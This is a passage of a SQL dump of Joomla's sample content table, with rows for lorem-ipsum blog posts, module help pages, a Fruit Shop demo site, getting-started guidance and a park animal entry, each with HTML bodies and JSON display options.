scelerisque erat at urna condimentum euismod. Fusce vestibulum facilisis est, a accumsan massa aliquam in. In auctor interdum mauris a luctus. Morbi euismod tempor dapibus. Duis dapibus posuere quam. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. In eu est nec erat sollicitudin hendrerit. Pellentesque sed turpis nunc, sit amet laoreet velit. Praesent vulputate semper nulla nec varius. Aenean aliquam, justo at blandit sodales, mauris leo viverra orci, sed sodales mauris orci vitae magna.</p>','<p>Quisque a massa sed libero tristique suscipit. Morbi tristique molestie metus, vel vehicula nisl ultrices pretium. Sed sit amet est et sapien condimentum viverra. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Phasellus viverra tortor porta orci convallis ac cursus erat sagittis. Vivamus aliquam, purus non luctus adipiscing, orci urna imperdiet eros, sed tincidunt neque sapien et leo. Cras fermentum, dolor id tempor vestibulum, neque lectus luctus mauris, nec congue tellus arcu nec augue. Nulla quis mi arcu, in bibendum quam. Sed placerat laoreet fermentum. In varius lobortis consequat. Proin vulputate felis ac arcu lacinia adipiscing. Morbi molestie, massa id sagittis luctus, sem sapien sollicitudin quam, in vehicula quam lectus quis augue. Integer orci lectus, bibendum in fringilla sit amet, rutrum eget enim. Curabitur at libero vitae lectus gravida luctus. Nam mattis, ligula sit amet vestibulum feugiat, eros sem sodales mi, nec dignissim ante elit quis nisi. Nulla nec magna ut leo convallis sagittis ac non erat. Etiam in augue nulla, sed tristique orci. Vestibulum quis eleifend sapien.</p><p>Nam ut orci vel felis feugiat posuere ut eu lorem. In risus tellus, sodales eu eleifend sed, imperdiet id nulla. Nunc at enim lacus. Etiam dignissim, arcu quis accumsan varius, dui dui faucibus erat, in molestie mauris diam ac lacus. Sed sit amet egestas nunc. Nam sollicitudin lacinia sapien, non gravida eros convallis vitae. Integer vehicula dui a elit placerat venenatis. Nullam tincidunt ligula aliquet dui interdum feugiat. Maecenas ultricies, lacus quis facilisis vehicula, lectus diam consequat nunc, euismod eleifend metus felis eu mauris. Aliquam dapibus, ipsum a dapibus commodo, dolor arcu accumsan neque, et tempor metus arcu ut massa. Curabitur non risus vitae nisl ornare pellentesque. Pellentesque nec ipsum eu dolor sodales aliquet. Vestibulum egestas scelerisque tincidunt. Integer adipiscing ultrices erat vel rhoncus.</p><p>Integer ac lectus ligula. Nam ornare nisl id magna tincidunt ultrices. Phasellus est nisi, condimentum at sollicitudin vel, consequat eu ipsum. In venenatis ipsum in ligula tincidunt bibendum id et leo. Vivamus quis purus massa. Ut enim magna, pharetra ut condimentum malesuada, auctor ut ligula. Proin mollis, urna a aliquam rutrum, risus erat cursus odio, a convallis enim lectus ut lorem. Nullam semper egestas quam non mattis. Vestibulum venenatis aliquet arcu, consectetur pretium erat pulvinar vel. Vestibulum in aliquet arcu. Ut dolor sem, pellentesque sit amet vestibulum nec, tristique in orci. Sed lacinia metus vel purus pretium sit amet commodo neque condimentum.</p><p>Aenean laoreet aliquet ullamcorper. Nunc tincidunt luctus tellus, eu lobortis sapien tincidunt sed. Donec luctus accumsan sem, at porttitor arcu vestibulum in. Sed suscipit malesuada arcu, ac porttitor orci volutpat in. Vestibulum consectetur vulputate eros ut porttitor. Aenean dictum urna quis erat rutrum nec malesuada tellus elementum. Quisque faucibus, turpis nec consectetur vulputate, mi enim semper mi, nec porttitor libero magna ut lacus. Quisque sodales, leo ut fermentum ullamcorper, tellus augue gravida magna, eget ultricies felis dolor vitae justo. Vestibulum blandit placerat neque, imperdiet ornare ipsum malesuada sed. Quisque bibendum quam porta diam molestie luctus. Sed metus lectus, ornare eu vulputate vel, eleifend facilisis augue. Maecenas eget urna velit, ac volutpat velit. Nam id bibendum ligula. Donec pellentesque, velit eu convallis sodales, nisi dui egestas nunc, et scelerisque lectus quam ut ipsum.</p>',1,27,'2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,2,'','',1,1147,'',0,'*','',''),(18,116,'Second Blog Post','second-blog-post','<p><em>Lorem Ipsum is text that is traditionally used by designers when working on a site before the content is ready.</em></p><p>Pellentesque bibendum metus ut dolor fermentum ut pulvinar tortor hendrerit. Nam vel odio vel diam tempus iaculis in non urna. Curabitur scelerisque, nunc id interdum vestibulum, felis elit luctus dui, ac dapibus tellus mauris tempus augue. Duis congue facilisis lobortis. Phasellus neque erat, tincidunt non lacinia sit amet, rutrum vitae nunc. Sed placerat lacinia fermentum. Integer justo sem, cursus id tristique eget, accumsan vel sapien. Curabitur ipsum neque, elementum vel vestibulum ut, lobortis a nisl. Fusce malesuada mollis purus consectetur auctor. Morbi tellus nunc, dapibus sit amet rutrum vel, laoreet quis mauris. Aenean nec sem nec purus bibendum venenatis. Mauris auctor commodo libero, in adipiscing dui adipiscing eu. Praesent eget orci ac nunc sodales varius.</p>','<p>Nam eget venenatis lorem. Vestibulum a interdum sapien. Suspendisse potenti. Quisque auctor purus nec sapien venenatis vehicula malesuada velit vehicula. Fusce vel diam dolor, quis facilisis tortor. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Pellentesque libero nisi, pellentesque quis cursus sit amet, vehicula vitae nisl. Curabitur nec nunc ac sem tincidunt auctor. Phasellus in mattis magna. Donec consequat orci eget tortor ultricies rutrum. Mauris luctus vulputate molestie. Proin tincidunt vehicula euismod. Nam congue leo non erat cursus a adipiscing ipsum congue. Nulla iaculis purus sit amet turpis aliquam sit amet dapibus odio tincidunt. Ut augue diam, congue ut commodo pellentesque, fermentum mattis leo. Sed iaculis urna id enim dignissim sodales at a ipsum. Quisque varius lobortis mollis. Nunc purus magna, pellentesque pellentesque convallis sed, varius id ipsum. Etiam commodo mi mollis erat scelerisque fringilla. Nullam bibendum massa sagittis diam ornare rutrum.</p><p>Praesent convallis metus ut elit faucibus tempus in quis dui. Donec fringilla imperdiet nibh, sit amet fringilla velit congue et. Quisque commodo luctus ligula, vitae porttitor eros venenatis in. Praesent aliquet commodo orci id varius. Nulla nulla nibh, varius id volutpat nec, sagittis nec eros. Cras et dui justo. Curabitur malesuada facilisis neque, sed tempus massa tincidunt ut. Sed suscipit odio in lacus auctor vehicula non ut lacus. In hac habitasse platea dictumst. Sed nulla nisi, lacinia in viverra at, blandit vel tellus. Nulla metus erat, ultrices non pretium vel, varius nec sem. Morbi sollicitudin mattis lacus quis pharetra. Donec tincidunt mollis pretium. Proin non libero justo, vitae mattis diam. Integer vel elit in enim varius posuere sed vitae magna. Duis blandit tempor elementum. Vestibulum molestie dui nisi.</p><p>Curabitur volutpat interdum lorem sed tempus. Sed placerat quam non ligula lacinia sodales. Cras ultrices justo at nisi luctus hendrerit. Quisque sit amet placerat justo. In id sapien eu neque varius pharetra sed in sapien. Etiam nisl nunc, suscipit sed gravida sed, scelerisque ut nisl. Mauris quis massa nisl, aliquet posuere ligula. Etiam eget tortor mauris. Sed pellentesque vestibulum commodo. Mauris vitae est a libero dapibus dictum fringilla vitae magna.</p><p>Nulla facilisi. Praesent eget elit et mauris gravida lobortis ac nec risus. Ut vulputate ullamcorper est, volutpat feugiat lacus convallis non. Maecenas quis sem odio, et aliquam libero. Integer vel tortor eget orci tincidunt pulvinar interdum at erat. Integer ullamcorper consequat eros a pellentesque. Cras sagittis interdum enim in malesuada. Etiam non nunc neque. Fusce non ligula at tellus porta venenatis. Praesent tortor orci, fermentum sed tincidunt vel, varius vel dui. Duis pulvinar luctus odio, eget porta justo vulputate ac. Nulla varius feugiat lorem sed tempor. Phasellus pulvinar dapibus magna eget egestas. In malesuada lectus at justo pellentesque vitae rhoncus nulla ultrices. Proin ut sem sem. Donec eu suscipit ipsum. Cras eu arcu porttitor massa feugiat aliquet at quis nisl.</p>',1,27,'2011-01-01 00:00:01',676,'','2011-01-01 00:00:01',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,1,'','',1,1133,'',0,'*','',''),(19,117,'Footer Module','footer-module','<p>This module shows the Joomla! copyright information. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Footer\" title=\"Footer Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule footer,Footer}</div>','',1,66,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:22:47',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',4,3,'','',1,2439,'',0,'*','',''),(20,118,'Fruit Shop','fruit-shop','<h2>Welcome to the Fruit Shop</h2>\r\n<p>We sell fruits from around the world. Please use our website to learn more about our business. We hope you will come to our shop and buy some fruit.</p>\r\n<p><em>This mini site will show you how you might want to set up a site for a business, in this example one selling fruit. It shows how to use access controls to manage your site content. If you were building a real site, you might want to extend it with e-commerce, a catalog, mailing lists or other enhancements, many of which are available through the</em><a href=\"http://extensions.joomla.org\"><em> Joomla! Extensions Directory</em></a>.</p>\r\n<p><em>To understand this site you will probably want to make one user with group set to customer and one with group set to grower. By logging in with different privileges you can see how access control works.</em></p>','',1,29,'2011-01-01 00:00:01',676,'Fruit Shop Webmaster','2011-12-27 11:17:59',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,1,'','',1,2008,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(21,119,'Getting Help','getting-help','<p><img class=\"image-left\" src=\"administrator/templates/hathor/images/header/icon-48-help_header.png\" border=\"0\" /> There are lots of places you can get help with Joomla!. In many places in your site administrator you will see the help icon. Click on this for more information about the options and functions of items on your screen. Other places to get help are:</p>\r\n<ul>\r\n<li><a href=\"http://forum.joomla.org\">Support Forums</a></li>\r\n<li><a href=\"http://docs.joomla.org\">Documentation</a></li>\r\n<li><a href=\"http://resources.joomla.org\">Professionals</a></li>\r\n<li><a href=\"http://shop.joomla.org/amazoncom-bookstores.html\">Books</a></li>\r\n</ul>','',1,19,'2011-01-01 00:00:01',676,'Joomla!','2011-01-10 15:32:54',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',10,8,'','',1,1914,'',0,'*','',''),(22,120,'Getting Started','getting-started','<p>It\'s easy to get started creating your website. Knowing some of the basics will help.</p>\r\n<h3>What is a Content Management System?</h3>\r\n<p>A content management system is software that allows you to create and manage webpages easily by separating the creation of your content from the mechanics required to present it on the web.</p>\r\n<p>In this site, the content is stored in a <em>database</em>. The look and feel are created by a <em>template</em>. The Joomla! software brings together the template and the content to create web pages.</p>\r\n<h3>Site and Administrator</h3>\r\n<p>Your site actually has two separate sites. The site (also called the front end) is what visitors to your site will see. The administrator (also called the back end) is only used by people managing your site. You can access the administrator by clicking the \"Site Administrator\" link on the \"This Site\" menu or by adding /administrator to the end of you domain name.</p>\r\n<p>Log in to the administrator using the username and password created during the installation of Joomla.</p>\r\n<h3>Logging in</h3>\r\n<p>To login to the front end of your site use the login form or the login menu link on the \"This Site\" menu. Use the user name and password that were created as part of the installation process. Once logged-in you will be able to create and edit articles.</p>\r\n<p>In managing your site, you will be able to create content that only logged-in users are able to see.</p>\r\n<h3>Creating an article</h3>\r\n<p>Once you are logged-in, a new menu will be visible. To create a new article, click on the \"submit article\" link on that menu.</p>\r\n<p>The new article interface gives you a lot of options, but all you need to do is add a title and put something in the content area. To make it easy to find, set the state to published and put it in the Joomla category.</p>\r\n<div>You can edit an existing article by clicking on the edit icon (this only displays to users who have the right to edit).</div>\r\n<h3>Learn more</h3>\r\n<p>There is much more to learn about how to use Joomla! to create the web site you envision. You can learn much more at the <a href=\"http://docs.joomla.org\">Joomla! documentation site</a> and on the<a href=\"http://forum.joomla.org\"> Joomla! forums</a>.</p>','',1,19,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:21:44',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,9,'','',1,2111,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(23,121,'Happy Orange Orchard','happy-orange-orchard','<p>At our orchard we grow the world\'s best oranges as well as other citrus fruit such as lemons and grapefruit. Our family has been tending this orchard for generations.</p>','',1,30,'2011-01-01 00:00:01',676,'Fruit Shop Webmaster','2011-01-01 00:00:01',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,2,'','',1,1467,'',0,'*','',''),(24,122,'Joomla!','joomla','<p>Congratulations! You have a Joomla site! Joomla makes it easy to build a website just the way you want it and keep it simple to update and maintain.</p>\r\n<p>Joomla is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. Joomla is open source, which means you can make it work just the way you want it to.</p>','',1,19,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:22:23',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,2,'','',1,1724,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(25,123,'Koala','koala','<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n','\r\n<p> </p>',1,72,'2011-01-01 00:00:01',676,'Parks Webmaster','2012-01-17 05:15:00',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/sampledata\\/parks\\/animals\\/180px_koala_ag1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"Koala  Thumbnail\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/sampledata\\/parks\\/animals\\/800px_koala_ag1.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"Koala Climbing Tree\",\"image_fulltext_caption\":\"Source: http:\\/\\/commons.wikimedia.org\\/wiki\\/File:Koala-ag1.jpg Author: Arnaud Gaillard License: Creative Commons Share Alike Attribution Generic 1.0\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,2,'','',1,892,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(26,124,'Language Switcher','language-switcher','<p>The language switcher module allows you to take advantage of the language tags that are available when content, modules and menu links are created.</p>\r\n<p>This module displays a list of available Content Languages for switching between them.</p>\r\n<p>When switching languages, it redirects to the Home page, or associated menu item, defined for the chosen language. Thereafter, the navigation will be the one defined for that language.</p>\r\n<p><strong>The language filter plugin must be enabled for this module to work properly.</strong></p>\r\n<p><strong></strong> <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Language_Switcher\" title=\"Language Switcher Module\">Help</a></p>\r\n<p>To view an example of the language switch moduler module, go to the site administrator and enable the language filter plugin and the language switcher module labelled \"language switcher\" and visit the fruit shop or park sample sites. Then follow<a href=\"http://docs.joomla.org/Language_Switcher_Tutorial_for_Joomla_1.6\"> the instructions in this tutorial</a>.</p>','',1,67,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:25:00',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,3,'','',1,2238,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(27,125,'Latest Articles Module','latest-articles-module','<p>This module shows a list of the most recently published and current Articles. Some that are shown may have expired even though they are the most recent. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Latest_News\" title=\"Latest Articles\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule articles_latest,Latest News}</div>','',1,64,'2011-01-01 00:00:01',676,'','2011-12-27 11:25:41',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,1,'modules, content','',1,2229,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(28,126,'Login Module','login-module','<p>This module displays a username and password login form. It also displays a link to retrieve a forgotten password. If user registration is enabled (in the Global Configuration settings), another link will be shown to enable self-registration for users. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Login\" title=\"Login\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule login,login}</div>','',1,65,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:20:35',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',4,2,'','',1,2314,'',0,'*','',''),(29,127,'Menu Module','menu-module','<p>This module displays a menu on the site (frontend).  Menus can be displayed in a wide variety of ways by using the menu options and css menu styles. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Menu\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule mod_menu,Menu Example}</div>','',1,75,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:18:45',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',8,1,'','',1,2246,'',0,'*','',''),(30,128,'Most Read Content','most-read-content','<p>This module shows a list of the currently published Articles which have the highest number of page views. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Most_Read\" title=\"Most Read Content\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule articles_popular,Articles Most Read}</div>','',1,64,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:26:41',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,2,'modules, content','',1,3553,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(31,129,'News Flash','news-flash','<p>Displays a set number of articles from a category based on date or random selection. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Articles_Newsflash\" title=\"News Flash Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule articles_news,News Flash}</div>','',1,64,'2011-01-01 00:00:01',676,'','2011-09-17 22:16:46',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',4,3,'modules, content','',1,2420,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(32,130,'Options','options','<p>As you make your Joomla! site you will control the details of the display using <em>options</em> also referred to as <em>parameter</em><strong>s</strong>. Options control everything from whether the author\'s name is displayed to who can view what to the number of items shown on a list.</p>\r\n<p>Default options for each component are changed using the Options button on the component toolbar.</p>\r\n<p>Options can also be set on an individual item, such as an article or contact and in menu 